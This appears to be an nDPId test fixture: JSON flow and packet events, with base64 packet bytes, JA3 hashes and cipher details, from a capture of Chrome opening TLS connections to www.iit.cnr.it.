00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":136,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509276,"flow_last_seen":1620902509338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509338,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509274,"flow_last_seen":1620902509342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509342,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1620902507870,"flow_last_seen":1620902514626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":687973,"flow_avg_l4_payload_len":798,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1134,"flow_first_seen":1620902508740,"flow_last_seen":1620902515037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":930115,"flow_avg_l4_payload_len":820,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":376,"flow_first_seen":1620902509272,"flow_last_seen":1620902515049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":297726,"flow_avg_l4_payload_len":791,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":956,"flow_first_seen":1620902509273,"flow_last_seen":1620902515019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":773272,"flow_avg_l4_payload_len":808,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1106,"flow_first_seen":1620902509274,"flow_last_seen":1620902515040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":914291,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1199,"flow_first_seen":1620902509276,"flow_last_seen":1620902515049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1009870,"flow_avg_l4_payload_len":842,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902507870,"flow_last_seen":1620902507870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902507870,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620902507870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902507870,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuJAbsdWbUDAAAAALAC\/\/8TEgAAAgQFtAEDAwUBAQgKM3SSOAAAAAAEAgAA"}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620902507899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902507899,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+4lEvFS6HVm1BKAS\/og8HwAAAgQFrAQCCAo6mxVSM3SSOAEDAwc="}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620902507899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902507899,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuJAbsdWbUERLxUu4AQECxZJAAAAQEICjN0klQ6mxVS"}
00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902507870,"flow_last_seen":1620902507899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902507899,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902507870,"flow_last_seen":1620902507935,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902507935,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902508740,"flow_last_seen":1620902508740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902508740,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620902508740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902508740,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuKAbtgbcSnAAAAALAC\/\/+8\/wAAAgQFtAEDAwUBAQgKM3SVkQAAAAAEAgAA"}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620902508769,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902508769,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+4peZebaYG3EqKAS\/og23AAAAgQFrAQCCAo6mxi5M3SVkQEDAwc="}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620902508769,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902508769,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuKAbtgbcSoXmXm24AQECxT5gAAAQEICjN0lag6mxi5"}
00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902508740,"flow_last_seen":1620902508769,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902508769,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902508740,"flow_last_seen":1620902508800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902508800,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509272,"flow_last_seen":1620902509272,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509272,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620902509272,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509272,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuYAbvjd2YSAAAAALAC\/\/+WlQAAAgQFtAEDAwUBAQgKM3SXeAAAAAAEAgAA"}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509273,"flow_last_seen":1620902509273,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509273,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1620902509273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509273,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuZAbt3hYKuAAAAALAC\/\/\/l6gAAAgQFtAEDAwUBAQgKM3SXeAAAAAAEAgAA"}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509274,"flow_last_seen":1620902509274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509274,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1620902509274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509274,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuaAbt39JnFAAAAALAC\/\/\/OYgAAAgQFtAEDAwUBAQgKM3SXeQAAAAAEAgAA"}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509276,"flow_last_seen":1620902509276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509276,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1620902509276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509276,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvubAbvm4fjEAAAAALAC\/\/8AcwAAAgQFtAEDAwUBAQgKM3SXewAAAAAEAgAA"}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1620902509302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509302,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5l1X2J5d4WCr6AS\/ojLGgAAAgQFrAQCCAo6mxrNM3SXeAEDAwc="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuZAbt3hYKvdV9ieoAQECzoIAAAAQEICjN0l5M6mxrN"}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620902509302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509302,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5gJQMJ043dmE6AS\/oiH6wAAAgQFrAQCCAo6mxrLM3SXeAEDAwc="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuYAbvjd2YTCUDCdYAQECyk8QAAAQEICjN0l5M6mxrL"}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1620902509302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509302,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5p\/iAsOd\/SZxqAS\/ogA1gAAAgQFrAQCCAo6mxrMM3SXeQEDAwc="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuaAbt39JnGf4gLD4AQECwd3QAAAQEICjN0l5M6mxrM"}
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620902509303,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509303,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5sh1fPg5uH4xaAS\/oinwwAAAgQFrAQCCAo6mxrPM3SXewEDAwc="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620902509303,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509303,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvubAbvm4fjFIdXz4YAQECzEywAAAQEICjN0l5Q6mxrP"}
00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509273,"flow_last_seen":1620902509303,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509272,"flow_last_seen":1620902509303,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509274,"flow_last_seen":1620902509304,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509276,"flow_last_seen":1620902509304,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
